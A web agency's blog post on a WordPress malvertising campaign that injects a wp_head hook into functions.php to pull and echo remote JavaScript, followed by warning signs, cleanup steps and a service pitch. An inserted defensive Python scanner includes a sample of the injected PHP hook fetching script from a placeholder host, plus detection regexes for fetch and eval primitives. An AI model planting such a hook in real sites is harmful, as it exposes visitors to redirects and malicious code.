Malvertising hiding in plain sight on WordPress websites

We’re seeing a malvertising campaign that quietly injects third-party scripts into WordPress sites. It looks like normal site code, but it redirects visitors, spawns pop-ups and can damage trust, SEO and conversions. Here’s what’s happening — and how to protect your business.

What’s going on

Attackers add a small snippet to a theme’s functions.php file. On each page load, it fetches JavaScript from attacker-controlled domains and prints it into the page head. Because it’s tucked into a theme function, it blends in with legitimate code and runs site-wide without obvious errors.

How the attack works (in plain English)

  • Hidden hook: A harmless-looking function is attached to WordPress’s wp_head, so it executes for every visitor.
  • Remote control: The function posts to a command-and-control server and echoes whatever script it gets back into your pages.
  • Malvertising payload: The returned script loads additional code from traffic-distribution domains to trigger pop-ups and forced redirects.
  • Stealth tactics: A 1×1 iframe mimics a legitimate CDN/verification script, and async settings help the malware avoid simple checks and performance tools.

Why this matters to your business

  • Trust & brand: Pop-ups and redirects make your site feel unsafe — customers may not return.
  • SEO impact: Search engines and browsers can warn or demote infected sites, cutting organic traffic.
  • Revenue risk: Disrupted user journeys reduce enquiries and sales; recovery costs add up fast.
  • Compliance: Serving malicious content to visitors’ devices can create complaints and obligations.

Warning signs

  • Unexpected pop-ups, redirects or “verification” screens appearing for visitors.
  • New or modified code at the end of your theme’s functions.php.
  • Outbound requests to unfamiliar domains from page headers.
  • Security tools flagging injected JavaScript or modified core/theme files.
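A defender-side check for the pattern described above (a wp_head callback that fetches remote script and echoes it into the page head, typically appended to functions.php): an added Python example, not code from matm or Sucuri. The sample functions.php text, the placeholder domain and the indicator regexes are constructed assumptions, and the brace matcher does not handle braces inside PHP strings.

```python
import re

# Constructed sample of a theme functions.php tail (not taken from the page or the Sucuri
# write-up): a benign wp_head callback, then an injected one that fetches and echoes remote JS.
SAMPLE_FUNCTIONS_PHP = r"""<?php
function mytheme_meta() { echo '<meta name="theme-color" content="#fff">'; }
add_action('wp_head', 'mytheme_meta');

function theme_verify_cdn() {
    $r = wp_remote_get('https://cdn-placeholder.invalid/verify.js');
    if (!is_wp_error($r)) { echo wp_remote_retrieve_body($r); }
}
add_action('wp_head', 'theme_verify_cdn');
"""

# Assumed heuristics: wp_head registrations, remote-fetch primitives, output primitives,
# common PHP eval/decoding helpers, and literal URLs worth reviewing at the firewall.
HOOK = re.compile(r"add_action\s*\(\s*['\"]wp_head['\"]\s*,\s*['\"]([A-Za-z_]\w*)['\"]")
REMOTE_FETCH = re.compile(r"\b(wp_remote_(?:get|post|request)|file_get_contents|curl_exec)\s*\(")
OUTPUT = re.compile(r"\b(echo|print|printf)\b")
OBFUSCATION = re.compile(r"\b(eval|base64_decode|str_rot13|gzinflate)\s*\(")
URL = re.compile(r"https?://[^\s'\"]+")

def function_body(source, name):
    """Return the body of the named PHP function by brace matching, or None if not found."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", source)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(source) and depth:
        depth += {"{": 1, "}": -1}.get(source[i], 0)
        i += 1
    return source[m.end():i - 1] if depth == 0 else None

def scan_wp_head_hooks(source):
    """Flag wp_head callbacks that echo remote content or use eval/decoding; report line and URLs."""
    findings = []
    for m in HOOK.finditer(source):
        name = m.group(1)
        body = function_body(source, name) or ""
        reasons = []
        if REMOTE_FETCH.search(body) and OUTPUT.search(body):
            reasons.append("fetches remote content and echoes it into <head>")
        if OBFUSCATION.search(body):
            reasons.append("uses eval/decoding primitives")
        if reasons:
            # Line of the add_action call: a hook near the end of functions.php matches the warning sign above.
            findings.append({"callback": name, "line": source[:m.start()].count("\n") + 1,
                             "reasons": reasons, "urls": URL.findall(body)})
    return findings
```

Run `scan_wp_head_hooks(open(path).read())` over each theme's (and child theme's) functions.php; the benign callback in the sample is not flagged, the injected one is reported with its line and the remote host to review.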

Quick response

  1. Shield traffic with a WAF: Put the site behind a web application firewall to block known bad requests while you clean. This adds a protective layer without changing your server.
  2. Remove the injected code: Back up first, then delete the suspicious function from functions.php. Check child themes too.
  3. Scan thoroughly: Use server-side scanning and file integrity checks to find other backdoors or injections. Follow with professional malware removal if needed.
  4. Rotate credentials: Change WordPress, hosting, database and SFTP passwords; enable 2FA for all admins.
  5. Audit outbound calls: Review logs and block malicious domains at your firewall.
  6. Restore if required: If you have a clean backup, restore and immediately apply hardening and updates.

Prevention and ongoing protection

  • Managed updates: Keep WordPress core, plugins and themes current. Managed WordPress maintenance reduces exposure from known vulnerabilities.
  • Least-privilege access: Limit admin accounts, enforce strong unique passwords and 2FA.
  • Security monitoring: Continuous monitoring alerts you to file changes, unauthorised scripts and policy violations early.
  • Web application firewall (WAF): Filter attacks and add virtual patching to reduce exploit risk.
  • Regular backups: Maintain automated, off-site backups for fast recovery after malware removal.
  • Plugin & theme hygiene: Only use reputable sources; remove anything unused.

How matm can help

  • Managed WordPress, plugin & theme updates
  • Security monitoring and WAF setup
  • Regular backups & fast site recovery
  • Malware removal and emergency response

If you’ve spotted suspicious pop-ups, redirects or code changes, we can help you recover calmly and quickly — and strengthen your WordPress security for the long term. Email [email protected] or call 01952 883 526.

Based on research by Sucuri; read the original analysis.